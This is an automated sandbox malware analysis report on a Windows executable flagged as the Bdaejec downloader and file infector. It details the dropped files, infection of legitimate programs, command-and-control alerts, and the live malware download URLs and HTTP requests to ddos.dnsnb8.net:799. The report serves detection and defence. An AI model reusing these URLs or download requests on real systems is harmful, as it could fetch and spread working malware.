Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
biKy3nZEyJ.exe

Overview

General Information

Sample name:biKy3nZEyJ.exe
renamed because original name is a hash value
Original sample name:98DC44E47B06318EBD73414912CD60F5FF71B3FE172476D353B4DDA39C7DC327.exe
Analysis ID:1480645
MD5:6963bb0311ded02ba57657ba4a61d427
SHA1:777ed3376f2b380fef0658e6b1ab4a90e4dca901
SHA256:98dc44e47b06318ebd73414912cd60f5ff71b3fe172476d353b4dda39c7dc327
Tags:exe
Infos:

Detection

Bdaejec
Score:81
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Yara detected Bdaejec
AI detected suspicious sample
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has a writeable .text section
Uses known network protocols on non-standard ports
AV process strings found (often used to terminate AV products)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Entry point lies outside standard sections
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found large amount of non-executed APIs
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Sample file is different than original file name gathered from version info
Sigma detected: Use Short Name Path in Command Line
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)

Classification

  • System is w10x64
  • biKy3nZEyJ.exe (PID: 7128 cmdline: "C:\Users\user\Desktop\biKy3nZEyJ.exe" MD5: 6963BB0311DED02BA57657BA4A61D427)
    • TJytnf.exe (PID: 3044 cmdline: C:\Users\user~1\AppData\Local\Temp\TJytnf.exe MD5: 56B2C3810DBA2E939A8BB9FA36D3CF96)
      • WerFault.exe (PID: 7592 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3044 -s 1568 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: TJytnf.exe PID: 3044JoeSecurity_BdaejecYara detected BdaejecJoe Security

    System Summary

    barindex
    Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: C:\Users\user~1\AppData\Local\Temp\TJytnf.exe, CommandLine: C:\Users\user~1\AppData\Local\Temp\TJytnf.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\TJytnf.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\TJytnf.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\TJytnf.exe, ParentCommandLine: "C:\Users\user\Desktop\biKy3nZEyJ.exe", ParentImage: C:\Users\user\Desktop\biKy3nZEyJ.exe, ParentProcessId: 7128, ParentProcessName: biKy3nZEyJ.exe, ProcessCommandLine: C:\Users\user~1\AppData\Local\Temp\TJytnf.exe, ProcessId: 3044, ProcessName: TJytnf.exe
    No Snort rule has matched
    Timestamp:2024-07-24T22:28:23.363275+0200
    SID:2838522
    Source Port:49362
    Destination Port:53
    Protocol:UDP
    Classtype:Malware Command and Control Activity Detected
    Timestamp:2024-07-24T22:28:24.383859+0200
    SID:2807908
    Source Port:49699
    Destination Port:799
    Protocol:TCP
    Classtype:Malware Command and Control Activity Detected
    Timestamp:2024-07-24T22:28:29.875738+0200
    SID:2807908
    Source Port:49700
    Destination Port:799
    Protocol:TCP
    Classtype:Malware Command and Control Activity Detected

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: biKy3nZEyJ.exeAvira: detected
    Source: http://ddos.dnsnb8.net:799/cj//k1.rar?Avira URL Cloud: Label: malware
    Source: http://ddos.dnsnb8.net:799/cj//k1.rarURL Reputation: Label: malware
    Source: http://ddos.dnsnb8.net/avaAvira URL Cloud: Label: malware
    Source: http://ddos.dnsnb8.net:799/cj//k2.rarC:Avira URL Cloud: Label: phishing
    Source: http://ddos.dnsnb8.net:799/cj//k2.rarmplesAvira URL Cloud: Label: malware
    Source: http://ddos.dnsnb8.net:799/cj//k2.rar%Avira URL Cloud: Label: phishing
    Source: http://ddos.dnsnb8.net:799/cj//k2.rar86)Avira URL Cloud: Label: malware
    Source: http://ddos.dnsnb8.net:799/cj//k1.rarsAvira URL Cloud: Label: phishing
    Source: http://ddos.dnsnb8.net:799/cj//k2.rarAvira URL Cloud: Label: malware
    Source: http://ddos.dnsnb8.net:799/cj//k2.rarpAvira URL Cloud: Label: phishing
    Source: http://ddos.dnsnb8.net/PtAvira URL Cloud: Label: phishing
    Source: http://ddos.dnsnb8.net:799/cj//k1.rar0Avira URL Cloud: Label: phishing
    Source: http://ddos.dnsnb8.net:799/cj//k1.rarpAvira URL Cloud: Label: phishing
    Source: http://ddos.dnsnb8.net:799/cj//k1.rarbC:Avira URL Cloud: Label: malware
    Source: http://ddos.dnsnb8.net:799/cj//k1.rar%Avira URL Cloud: Label: phishing
    Source: http://ddos.dnsnb8.net:799/cj//k1.rar(Avira URL Cloud: Label: malware
    Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeAvira: detection malicious, Label: W32/Jadtre.B
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeAvira: detection malicious, Label: TR/Dldr.Small.Z.haljq
    Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeAvira: detection malicious, Label: W32/Jadtre.B
    Source: C:\Program Files\7-Zip\Uninstall.exeAvira: detection malicious, Label: W32/Jadtre.B
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
    Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJoe Sandbox ML: detected
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeJoe Sandbox ML: detected
    Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJoe Sandbox ML: detected
    Source: C:\Program Files\7-Zip\Uninstall.exeJoe Sandbox ML: detected
    Source: biKy3nZEyJ.exeJoe Sandbox ML: detected
    Source: biKy3nZEyJ.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: Binary string: E:\XUtilities\HASP Programs\NHaspX\Release\NHaspX.pdb source: biKy3nZEyJ.exe
    Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.5.dr
    Source: Binary string: E:\XUtilities\HASP Programs\NHaspX\Release\NHaspX.pdbe source: biKy3nZEyJ.exe

    Spreading

    barindex
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeSystem file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeCode function: 5_2_00F729E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,5_2_00F729E2
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeCode function: 5_2_00F72B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,5_2_00F72B8C
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\Jump to behavior

    Networking

    barindex
    Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 799
    Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 799
    Source: global trafficTCP traffic: 192.168.2.7:49699 -> 44.221.84.105:799
    Source: Joe Sandbox ViewIP Address: 44.221.84.105 44.221.84.105
    Source: global trafficHTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeCode function: 5_2_00F71099 wsprintfA,WinExec,lstrlen,wsprintfA,wsprintfA,URLDownloadToFileA,lstrlen,Sleep,5_2_00F71099
    Source: global trafficHTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
    Source: global trafficDNS traffic detected: DNS query: ddos.dnsnb8.net
    Source: TJytnf.exe, 00000005.00000002.1847102783.0000000000F73000.00000002.00000001.01000000.00000004.sdmp, TJytnf.exe, 00000005.00000003.1270045728.0000000001360000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE
    Source: TJytnf.exe, 00000005.00000002.1847735199.000000000147F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net/Pt
    Source: TJytnf.exe, 00000005.00000002.1847735199.00000000014AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net/ava
    Source: TJytnf.exe, 00000005.00000003.1303493025.000000000145A000.00000004.00000020.00020000.00000000.sdmp, TJytnf.exe, 00000005.00000003.1303493025.000000000147F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar
    Source: TJytnf.exe, 00000005.00000003.1303493025.000000000145A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar%
    Source: TJytnf.exe, 00000005.00000002.1847735199.000000000143E000.00000004.00000020.00020000.00000000.sdmp, TJytnf.exe, 00000005.00000003.1303493025.000000000145A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar(
    Source: TJytnf.exe, 00000005.00000003.1303493025.000000000145A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar0
    Source: TJytnf.exe, 00000005.00000002.1847735199.000000000143E000.00000004.00000020.00020000.00000000.sdmp, TJytnf.exe, 00000005.00000003.1303493025.000000000145A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar?
    Source: TJytnf.exe, 00000005.00000003.1303493025.000000000147F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarbC:
    Source: TJytnf.exe, 00000005.00000003.1303493025.000000000145A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarp
    Source: TJytnf.exe, 00000005.00000003.1303493025.000000000147F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rars
    Source: TJytnf.exe, 00000005.00000002.1847735199.000000000143E000.00000004.00000020.00020000.00000000.sdmp, TJytnf.exe, 00000005.00000002.1847735199.000000000147F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar
    Source: TJytnf.exe, 00000005.00000002.1847735199.000000000143E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar%
    Source: TJytnf.exe, 00000005.00000002.1847735199.000000000147F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar86)
    Source: TJytnf.exe, 00000005.00000002.1847735199.000000000147F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarC:
    Source: TJytnf.exe, 00000005.00000002.1847735199.000000000147F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarmples
    Source: TJytnf.exe, 00000005.00000002.1848086577.000000000309A000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarp
    Source: Amcache.hve.5.drString found in binary or memory: http://upx.sf.net
    Source: SciTE.exe.5.drString found in binary or memory: http://www.activestate.com
    Source: SciTE.exe.5.drString found in binary or memory: http://www.activestate.comHolger
    Source: SciTE.exe.5.drString found in binary or memory: http://www.baanboard.com
    Source: SciTE.exe.5.drString found in binary or memory: http://www.baanboard.comBrendon
    Source: SciTE.exe.5.drString found in binary or memory: http://www.develop.com
    Source: SciTE.exe.5.drString found in binary or memory: http://www.develop.comDeepak
    Source: SciTE.exe.5.drString found in binary or memory: http://www.lua.org
    Source: SciTE.exe.5.drString found in binary or memory: http://www.rftp.com
    Source: SciTE.exe.5.drString found in binary or memory: http://www.rftp.comJosiah
    Source: SciTE.exe.5.drString found in binary or memory: http://www.scintilla.org
    Source: SciTE.exe.5.drString found in binary or memory: http://www.scintilla.org/scite.rng
    Source: SciTE.exe.5.drString found in binary or memory: http://www.spaceblue.com
    Source: SciTE.exe.5.drString found in binary or memory: http://www.spaceblue.comMathias
    Source: SciTE.exe.5.drString found in binary or memory: https://www.smartsharesystems.com/
    Source: SciTE.exe.5.drString found in binary or memory: https://www.smartsharesystems.com/Morten
    Source: SciTE.exe.5.drBinary or memory string: _winapi_getrawinputdata _winapi_getrawinputdeviceinfo _winapi_getregiondata _winapi_getregisteredrawinputdevices \memstr_3300877b-6

    System Summary

    barindex
    Source: biKy3nZEyJ.exeStatic PE information: section name: A#uq
    Source: MyProg.exe.5.drStatic PE information: section name: Y|uR
    Source: TJytnf.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeCode function: 1_2_004528101_2_00452810
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeCode function: 1_2_0044DC201_2_0044DC20
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeCode function: 1_2_004420301_2_00442030
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeCode function: 1_2_004429701_2_00442970
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeCode function: 1_2_00451E501_2_00451E50
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeCode function: 1_2_0044DAC01_2_0044DAC0
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeCode function: 1_2_004522C01_2_004522C0
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeCode function: 1_2_004492E01_2_004492E0
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeCode function: 1_2_004413601_2_00441360
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeCode function: 1_2_0040431D1_2_0040431D
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeCode function: 5_2_00F760765_2_00F76076
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeCode function: 5_2_00F76D005_2_00F76D00
    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\TJytnf.exe 4354970CCC7CD6BB16318F132C34F6A1B3D5C2EA7FF53E1C9271905527F2DB07
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3044 -s 1568
    Source: MyProg.exe.5.drStatic PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79
    Source: biKy3nZEyJ.exe, 00000001.00000000.1268119795.000000000073B000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameNHASPX.exeF vs biKy3nZEyJ.exe
    Source: biKy3nZEyJ.exeBinary or memory string: OriginalFilenameNHASPX.exeF vs biKy3nZEyJ.exe
    Source: biKy3nZEyJ.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: TJytnf.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
    Source: TJytnf.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
    Source: TJytnf.exe.1.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
    Source: classification engineClassification label: mal81.spre.troj.evad.winEXE@6/13@1/1
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeCode function: 5_2_00F7119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle,5_2_00F7119F
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\k1[1].rarJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3044
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeFile created: C:\Users\user~1\AppData\Local\Temp\TJytnf.exeJump to behavior
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: unknownProcess created: C:\Users\user\Desktop\biKy3nZEyJ.exe "C:\Users\user\Desktop\biKy3nZEyJ.exe"
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeProcess created: C:\Users\user\AppData\Local\Temp\TJytnf.exe C:\Users\user~1\AppData\Local\Temp\TJytnf.exe
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3044 -s 1568
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeProcess created: C:\Users\user\AppData\Local\Temp\TJytnf.exe C:\Users\user~1\AppData\Local\Temp\TJytnf.exeJump to behavior
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeSection loaded: msimg32.dllJump to behavior
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeSection loaded: oledlg.dllJump to behavior
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeSection loaded: oleacc.dllJump to behavior
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeSection loaded: winmm.dllJump to behavior
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeSection loaded: ntvdm64.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeSection loaded: ntvdm64.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeAutomated click: OK
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeAutomated click: OK
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeAutomated click: OK
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: biKy3nZEyJ.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
    Source: biKy3nZEyJ.exeStatic file information: File size 3101704 > 1048576
    Source: biKy3nZEyJ.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x259600
    Source: biKy3nZEyJ.exeStatic PE information: More than 200 imports for USER32.dll
    Source: biKy3nZEyJ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: Binary string: E:\XUtilities\HASP Programs\NHaspX\Release\NHaspX.pdb source: biKy3nZEyJ.exe
    Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.5.dr
    Source: Binary string: E:\XUtilities\HASP Programs\NHaspX\Release\NHaspX.pdbe source: biKy3nZEyJ.exe

    Data Obfuscation

    barindex
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeUnpacked PE file: 5.2.TJytnf.exe.f70000.0.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;
    Source: initial sampleStatic PE information: section where entry point is pointing to: A#uq
    Source: biKy3nZEyJ.exeStatic PE information: section name: CONST
    Source: biKy3nZEyJ.exeStatic PE information: section name: A#uq
    Source: TJytnf.exe.1.drStatic PE information: section name: .aspack
    Source: TJytnf.exe.1.drStatic PE information: section name: .adata
    Source: Uninstall.exe.5.drStatic PE information: section name: EpNuZ
    Source: MyProg.exe.5.drStatic PE information: section name: PELIB
    Source: MyProg.exe.5.drStatic PE information: section name: Y|uR
    Source: SciTE.exe.5.drStatic PE information: section name: u
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeCode function: 1_2_00401840 push 00411729h; ret 1_2_00401845
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeCode function: 1_2_00405846 push ecx; retn 006Dh1_2_00405847
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeCode function: 1_2_00403454 push 00406339h; ret 1_2_00403468
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeCode function: 1_2_00402455 push FFFFFF86h; ret 1_2_00402457
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeCode function: 1_2_00404C6D push 0040598Ch; ret 1_2_00404CAC
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeCode function: 1_2_0040187A push 0041A712h; ret 1_2_00401887
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeCode function: 1_2_00407C04 push 00424CBFh; ret 1_2_00407C0C
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeCode function: 1_2_0040740B push 00436788h; ret 1_2_00407417
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeCode function: 1_2_00403818 push 00407F45h; ret 1_2_00403844
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeCode function: 1_2_00406418 push 00409DE9h; ret 1_2_00406428
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeCode function: 1_2_00401C1D push 00430E02h; ret 1_2_00401C56
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeCode function: 1_2_00401C1F push 00430E02h; ret 1_2_00401C56
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeCode function: 1_2_00402C2E push 0041D9C4h; ret 1_2_00402C4D
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeCode function: 1_2_00439439 push 0041340Eh; ret 1_2_0043D062
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeCode function: 1_2_0040C8CA push 00407821h; ret 1_2_0040C8CF
